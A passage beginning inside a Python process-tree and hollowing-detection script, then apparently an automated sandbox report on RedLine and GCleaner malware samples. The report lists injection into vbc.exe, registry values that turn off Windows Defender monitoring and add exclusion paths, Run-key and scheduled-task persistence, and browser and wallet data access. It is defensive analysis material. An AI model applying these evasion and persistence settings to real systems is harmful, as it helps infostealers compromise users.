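            and graph["names"][dst].lower().startswith("c:\\windows\\")]


if __name__ == "__main__":
    g = build_graph(parse_rows(REPORT_ROWS))
    print("\n".join(render(g)))
    print("hollowing candidates:", hollowing_candidates(g))
```

Run stand-alone it prints two trees, one rooted at PID 2180 (Furk Ultra_10298.exe) with two setup10298.exe children that each injected into a GenericSetup.exe copy, and one rooted at PID 3596 whose only child is the hollowed vbc.exe.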

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe

"C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 3596 -ip 3596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 308

Network

Country | Destination | Domain | Proto
N/A | 72.21.91.29:80 | | tcp
N/A | 93.184.221.240:80 | | tcp
N/A | 93.184.221.240:80 | | tcp
N/A | 51.11.192.48:443 | | tcp
N/A | 93.184.221.240:80 | | tcp
N/A | 93.184.221.240:80 | | tcp
N/A | 104.80.225.205:443 | | tcp
N/A | 8.8.8.8:53 | 176.122.125.40.in-addr.arpa | udp
N/A | 82.115.223.46:57672 | | tcp
N/A | 82.115.223.46:57672 | | tcp

Files

memory/3048-132-0x0000000000000000-mapping.dmp

memory/3596-133-0x0000000000790000-0x0000000000817000-memory.dmp

memory/3048-134-0x0000000000400000-0x0000000000430000-memory.dmp

memory/4312-139-0x0000000000000000-mapping.dmp

memory/3048-140-0x0000000005B00000-0x0000000006118000-memory.dmp

memory/3048-141-0x0000000005670000-0x000000000577A000-memory.dmp

memory/3048-142-0x00000000055A0000-0x00000000055B2000-memory.dmp

memory/3048-143-0x0000000005600000-0x000000000563C000-memory.dmp

memory/3048-144-0x0000000001420000-0x0000000001486000-memory.dmp

memory/3048-145-0x0000000006600000-0x0000000006692000-memory.dmp

memory/3048-146-0x0000000006C50000-0x00000000071F4000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win7-20221111-en

Max time kernel

158s

Max time network

164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"

Signatures

GCleaner

loader gcleaner

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\FZMYpcBymcbXiuVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WyuevociGfNU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XxxUzwYQU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OdCkbftzuRPDCLooswR = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NxGlAgQUfzUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WyuevociGfNU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XxxUzwYQU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\unWhUoTpcLxwC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NxGlAgQUfzUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\unWhUoTpcLxwC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\FZMYpcBymcbXiuVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\HsdHtTcNAoJBjrVs = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OdCkbftzuRPDCLooswR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
N/A N/A C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\InfoInstall = "C:\\Users\\Admin\\AppData\\Roaming\\InfoInstall\\InfoInstall.exe" C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\SysWOW64\is-A7MMA.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Reg Organizer\Languages\is-SVNUU.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-DV6H2.tmp C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-K3SKE.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-LKVCE.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-P4TTQ.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-4486U.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\cjNumber C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe N/A
File created C:\Program Files (x86)\Reg Organizer\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-GL0IN.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-6DSK2.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\Documentation\English\is-20DUD.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\ScanRename\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-UGFNF.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-JIS9A.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-QFE3J.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File opened for modification C:\Program Files (x86)\Reg Organizer\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-860AH.tmp C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-1DM7Q.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-45AFE.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File opened for modification C:\Program Files (x86)\Any Drive Formatter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-HQ93Q.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File opened for modification C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
File created C:\Program Files (x86)\Reg Organizer\is-3ASBN.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-52SMQ.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-3DEJA.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe N/A
File opened for modification C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-FBLHA.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-UPG7J.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-NG4MM.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-HEEQK.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-194OU.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-AA2TF.tmp C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-SUQ5L.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-1V9A0.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-FH67E.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-SJL9F.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\ScanRename\is-9EDC2.tmp C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File opened for modification C:\Program Files (x86)\ScanRename\ScanRename.exe C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File opened for modification C:\Program Files (x86)\ScanRename\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-GLMA5.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-GSAUU.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-7Q57V.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\is-85F56.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\XxxUzwYQU\gZNljN.dll C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-D660G.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files (x86)\Reg Organizer\Documentation\Russian\is-VS512.tmp C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-51CA6.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
File created C:\Program Files (x86)\Any Drive Formatter\is-POECU.tmp C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bGAvhKhnIPTNQeobsw.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\YESfVrKgbFKcjSeIN.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\iwOiVBtjWoVYUMW.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
